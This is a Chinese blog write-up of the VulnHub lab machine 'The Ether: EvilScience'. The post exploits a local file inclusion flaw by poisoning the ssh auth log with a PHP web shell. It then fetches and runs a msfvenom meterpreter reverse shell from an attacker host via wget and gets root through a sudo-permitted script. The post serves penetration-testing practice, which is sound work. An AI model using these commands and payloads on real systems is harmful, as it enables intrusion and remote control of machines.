theEther:evilscience

最新推荐文章于 2024-08-04 23:30:00 发布
最新推荐文章于 2024-08-04 23:30:00 发布
阅读量61 收藏 1
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/140914142
版权

一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

nmap 192.168.236.158 -p- -A

3、目录扫描

dirsearch -u http://192.168.236.158

二、漏洞探测

步骤一:访问80端口,寻找功能点,点击 ABOUT US 后,URL中有请求参数:/?file=about.php,可能存在文件包含漏洞

步骤二:对此页面使用 Burp 进行抓包,爆破文件,在此之前,下载一个路径文件 LFI-JHADDIX.txt

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt

步骤三:爆破之后,在 /var/log/auth.log 路径下可以读取到ssh登录日志

步骤四:利用ssh登录产生错误日志写入一句话木马,测试发现可以利用cmd执行命令,说明木马写入成功

ssh '<?php @system($_GET[cmd]);?>'@192.168.236.158

三、GetShell

步骤一:用msfvenom生成 shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.236.137 LPORT=4444 -f elf > shell.elf

步骤二:设置监听

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.236.137
set lport 4444
run

步骤三:开启web服务,进行远程下载,利用前面的漏洞执行远程下载和运行,将以下命令拼接在URL参数后面,执行,三条命令执行完成,即可监听成功

python3 -m http.server 8000

/?file=/var/log/auth.log&cmd=system('wget+192.168.236.137:8000/shell.elf')%3b
/?file=/var/log/auth.log&cmd=system('chmod+%2bx+shell.elf')%3b
/?file=/var/log/auth.log&cmd=system('./shell.elf')%3b

四、提权

步骤一:获取交互式shell

shell python -c 'import pty;pty.spawn("/bin/bash")'

步骤二:查询一下具有sudo权限的命令

sudo -l

步骤三:发现xxxlogauditorxxx.py 可以以 root 运行,执行以下命令,成功提权

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

花椒椒椒
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
LYJ20010728的博客
08-07 1081
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE环境下载THE ETHER: EVILSCIENCE靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 THE ETHER: EVILSCIENCE靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 攻击机IP地址:192.168.246.129 渗透测试 信息搜集 用netdiscover查看一下:sudo netdiscover -r 192.168.246.0
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习
我是小小白的博客
07-09 544
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习 前言 靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip 靶机难度:中级(CTF) 靶机发布日期:2017 年 10 月 30 日 靶机描述:最近,我一直喜欢为安全社区创造黑客挑战。这一新挑战囊括了一家名为 The Ether 的公司,该公司宣布了一种显着改变人类福利的灵丹妙药。由于他们正在开发的产品的性质,CDC 对这个群体产生了怀疑。 目标:
The Ether: EvilScience靶机渗透实战总结
weixin_34220834的博客
08-20 1108
近期朋友给我发了一个靶机,说是他在日志注入的时候遇到了一点小问题,让我帮忙解决一下。下载下来之后,感觉这个靶机还是挺不错的,里边有一些套路,于是整理成一篇文章,感兴趣的小伙伴可以自己尝试一下。 靶机下载https://www.vulnhub.com/entry... 信息收集首先扫描内网,发现目标主机ip arp-scan -l ...
Vulnhub 渗透练习(八)—— THE ETHER: EVILSCIENCE
shinygod的博客
02-19 601
本地文件包含:利用 ssh 登录产生错误日志写入一句话木马(ssh ''@ip)seclists 字典:https://github.com/danielmiessler/SecListssudo -l。
Vulnhub靶机 The Ether: EvilScience (v1.0.1)(渗透测试详解)
2301_78721909的博客
08-03 170
Vulnhub靶机 The Ether: EvilScience (v1.0.1) 渗透测试拿shell
Vulnhub-theEther
m0_52016680的博客
11-09 940
Vulnhub类OSCP靶机
theEther_1.0.1靶机
最新发布
m0_65285254的博客
08-04 153
将获取到的shell转变为交互式的shell:python -c 'import pty;pty.spawn("/bin/bash")'发现下在点击上面的ABOUT US之后,url里有着请求参数:/index.php?对可能存在文件包含漏洞的页面进行burp抓包,对file参数后面进行文件爆破。发现有一个/var/log/auth.log有日志记录,并且是ssh的记录。将会获得root权限 /var/log/auth.log | id。发送到 intruder模块。使用msfvenom。
Vulnhub靶场渗透-theEther
paidx0
10-03 1255
前言 这次的靶机还是很好玩的,有点难度折腾了挺久,但方法对了那就很容易了 靶机ip(192.168.110.129) 攻击机ip(192.168.110.127) 网络NAT模式 不废话了直接开始 信息收集 打开网页简单看了看,没有过多的内容,是个基因的论文网站 网站没有太多的功能,而且扫目录也没扫到什么有价值的东西 最开始以为网站上的这些单词可能会用到,就利用他们做了个字典去爆破 ssh,显然我的方法就是错的 漏洞挖掘 注意到这个位置很有可能是利用存在读文件,简单尝试了几次Apache的日志文件
kali渗透综合靶机(十六)--evilscience靶机
W小哥
04-02 1038
https://download.vulnhub.com/theether/theEther_1.0.1.zip
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8362
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
数理方法习题 前六章.pdf
08-03
数理方法习题 前六章
某大型制造企业IT蓝图规划及实施路线.pptx
08-03
某大型制造企业IT蓝图规划及实施路线.pptx
基于Springboot和Vue的社区团购系统设计源码 社区团购系统设计代码(98分期末优秀大作业)
08-03
社区团购系统设计源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
去哪儿旅游&小红书-旅行行业:2023五一旅行趋势报告—想出去玩.pdf
08-03
去哪儿旅游&小红书-旅行行业:2023五一旅行趋势报告—想出去玩
基于matlab设计的火焰检测定位.zip
08-03
在MATLAB中,可以使用多种方法进行车牌、人脸、车道线、表盘检测、行人识别和行为识别。以下是一些常见的方法: 1. 车牌检测:可以使用基于图像处理和机器学习的方法来检测车牌。常见的方法包括颜色过滤、形态学操作、边缘检测和字符分割等。 2. 人脸检测:可以使用基于特征提取和分类的方法来检测人脸。常见的方法包括Haar级联分类器、人工神经网络和深度学习方法等。 3. 车道线检测:可以使用基于边缘检测和曲线拟合的方法来检测车道线。常见的方法包括Canny边缘检测和霍夫变换等。 4. 表盘检测:可以使用基于特征提取和机器学习的方法来检测表盘。常见的方法包括颜色过滤、形态学操作、边缘检测和特征匹配等。 5. 行人识别:可以使用基于特征提取和分类的方法来识别行人。常见的方法包括HOG特征提取、SIFT特征提取和深度学习方法等。 6. 行为识别:可以使用基于特征提取和分类的方法来识别行为。常见的方法包括间接算法、基于模型的方法和深度学习方法等。 以上只是一些常见的方法,具体的实现还需要根据具体的问题和数据来选择合适的方法。MATLAB提供了丰富的图像处理和机器学习工具,可以方便地实现这些功能。
华工数字信号处理-DTMF信号的产生与识别 (1).doc
08-03
华工数字信号处理-DTMF信号的产生与识别 (1).doc
基于Springboot和Vue的社区团购系统设计源码 社区团购系统设计代码(优秀毕业设计)
08-03
社区团购系统设计源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
【参数辨识】基于matlab粒子群算法求解异步电动机的参数估计优化问题【含Matlab源码 6764期】.mp4
08-03
Matlab研究室上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
数学物理方法-期末-兰州城市学院.pdf
08-03
数学物理方法-期末-兰州城市学院
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值